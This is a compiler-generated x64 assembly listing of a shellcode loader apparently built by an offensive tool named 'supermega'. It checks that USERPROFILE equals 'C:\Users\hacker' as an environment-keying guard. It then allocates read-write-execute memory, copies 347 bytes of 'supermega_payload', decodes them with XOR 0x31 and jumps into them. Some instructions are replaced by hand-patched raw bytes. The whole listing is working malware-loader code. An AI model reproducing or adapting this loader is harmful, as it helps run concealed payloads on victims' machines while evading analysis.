; Listing generated by Microsoft (R) Optimizing Compiler Version 19.37.32822.0 include listing.inc INCLUDELIB LIBCMT INCLUDELIB OLDNAMES _DATA SEGMENT COMM supermega_payload:QWORD _DATA ENDS PUBLIC main PUBLIC mystrcmp EXTRN __imp_GetEnvironmentVariableW:PROC EXTRN __imp_VirtualAlloc:PROC pdata SEGMENT $pdata$main DD imagerel $LN8 DD imagerel $LN8+266 DD imagerel $unwind$main $pdata$mystrcmp DD imagerel $LN6 DD imagerel $LN6+109 DD imagerel $unwind$mystrcmp pdata ENDS _DATA SEGMENT $SG72513 DB 'U', 00H, 'S', 00H, 'E', 00H, 'R', 00H, 'P', 00H, 'R', 00H DB 'O', 00H, 'F', 00H, 'I', 00H, 'L', 00H, 'E', 00H, 00H, 00H $SG72514 DB 'C', 00H, ':', 00H, '\', 00H, 'U', 00H, 's', 00H, 'e', 00H DB 'r', 00H, 's', 00H, '\', 00H, 'h', 00H, 'a', 00H, 'c', 00H, 'k' DB 00H, 'e', 00H, 'r', 00H, 00H, 00H _DATA ENDS xdata SEGMENT $unwind$main DD 040a01H DD 010f010aH DD 060027003H $unwind$mystrcmp DD 010e01H DD 0220eH xdata ENDS ; Function compile flags: /Odtp _TEXT SEGMENT i$ = 0 str1$ = 32 str2$ = 40 mystrcmp PROC ; File C:\Users\hacker\source\repos\supermega\build\main.c ; Line 40 $LN6: mov QWORD PTR [rsp+16], rdx mov QWORD PTR [rsp+8], rcx sub rsp, 24 ; Line 41 mov DWORD PTR i$[rsp], 0 $LN2@mystrcmp: ; Line 42 movsxd rax, DWORD PTR i$[rsp] mov rcx, QWORD PTR str1$[rsp] movzx eax, WORD PTR [rcx+rax*2] test eax, eax je SHORT $LN3@mystrcmp movsxd rax, DWORD PTR i$[rsp] mov rcx, QWORD PTR str2$[rsp] movzx eax, WORD PTR [rcx+rax*2] test eax, eax je SHORT $LN3@mystrcmp ; Line 43 movsxd rax, DWORD PTR i$[rsp] mov rcx, QWORD PTR str1$[rsp] movzx eax, WORD PTR [rcx+rax*2] movsxd rcx, DWORD PTR i$[rsp] mov rdx, QWORD PTR str2$[rsp] movzx ecx, WORD PTR [rdx+rcx*2] cmp eax, ecx je SHORT $LN4@mystrcmp ; Line 44 mov eax, 1 jmp SHORT $LN1@mystrcmp $LN4@mystrcmp: ; Line 46 mov eax, DWORD PTR i$[rsp] inc eax mov DWORD PTR i$[rsp], eax ; Line 47 jmp SHORT $LN2@mystrcmp $LN3@mystrcmp: ; Line 48 xor eax, eax $LN1@mystrcmp: ; Line 49 add rsp, 24 ret 0 mystrcmp ENDP _TEXT ENDS ; Function compile flags: /Odtp _TEXT SEGMENT n$1 = 32 dest$ = 40 result$ = 48 envVarName$ = 56 tocheck$ = 80 buffer$ = 112 main PROC ; File C:\Users\hacker\source\repos\supermega\build\main.c ; Line 6 $LN8: push rsi push rdi sub rsp, 2168 ; 00000878H ; Line 10 lea rax, QWORD PTR envVarName$[rsp] DB 0b1H, 070H, 04bH, 02fH, 095H ; .rdata Reuse for $SG72513 (rcx) mov rdi, rax mov rsi, rcx mov ecx, 24 rep movsb ; Line 11 lea rax, QWORD PTR tocheck$[rsp] DB 0eeH, 0c0H, 0a1H, 044H, 0d6H ; .rdata Reuse for $SG72514 (rcx) mov rdi, rax mov rsi, rcx mov ecx, 32 ; 00000020H rep movsb ; Line 13 mov r8d, 1024 ; 00000400H lea rdx, QWORD PTR buffer$[rsp] lea rcx, QWORD PTR envVarName$[rsp] call QWORD PTR __imp_GetEnvironmentVariableW mov DWORD PTR result$[rsp], eax ; Line 14 cmp DWORD PTR result$[rsp], 0 jne SHORT $LN5@main ; Line 15 mov eax, 6 jmp $LN1@main $LN5@main: ; Line 17 lea rdx, QWORD PTR tocheck$[rsp] lea rcx, QWORD PTR buffer$[rsp] call mystrcmp test eax, eax je SHORT $LN6@main ; Line 18 mov eax, 6 jmp SHORT $LN1@main $LN6@main: ; Line 23 mov r9d, 64 ; 00000040H mov r8d, 12288 ; 00003000H mov edx, 347 ; 0000015bH xor ecx, ecx call QWORD PTR __imp_VirtualAlloc mov QWORD PTR dest$[rsp], rax ; Line 29 mov DWORD PTR n$1[rsp], 0 jmp SHORT $LN4@main $LN2@main: mov eax, DWORD PTR n$1[rsp] inc eax mov DWORD PTR n$1[rsp], eax $LN4@main: cmp DWORD PTR n$1[rsp], 347 ; 0000015bH jge SHORT $LN3@main ; Line 30 movsxd rax, DWORD PTR n$1[rsp] movsxd rcx, DWORD PTR n$1[rsp] mov rdx, QWORD PTR dest$[rsp] mov rdi, QWORD PTR supermega_payload movzx eax, BYTE PTR [rdi+rax] mov BYTE PTR [rdx+rcx], al ; Line 31 movsxd rax, DWORD PTR n$1[rsp] mov rcx, QWORD PTR dest$[rsp] movsx eax, BYTE PTR [rcx+rax] xor eax, 49 ; 00000031H movsxd rcx, DWORD PTR n$1[rsp] mov rdx, QWORD PTR dest$[rsp] mov BYTE PTR [rdx+rcx], al ; Line 32 jmp SHORT $LN2@main $LN3@main: ; Line 35 call QWORD PTR dest$[rsp] ; Line 37 xor eax, eax $LN1@main: ; Line 38 add rsp, 2168 ; 00000878H pop rdi pop rsi ret 0 main ENDP _TEXT ENDS END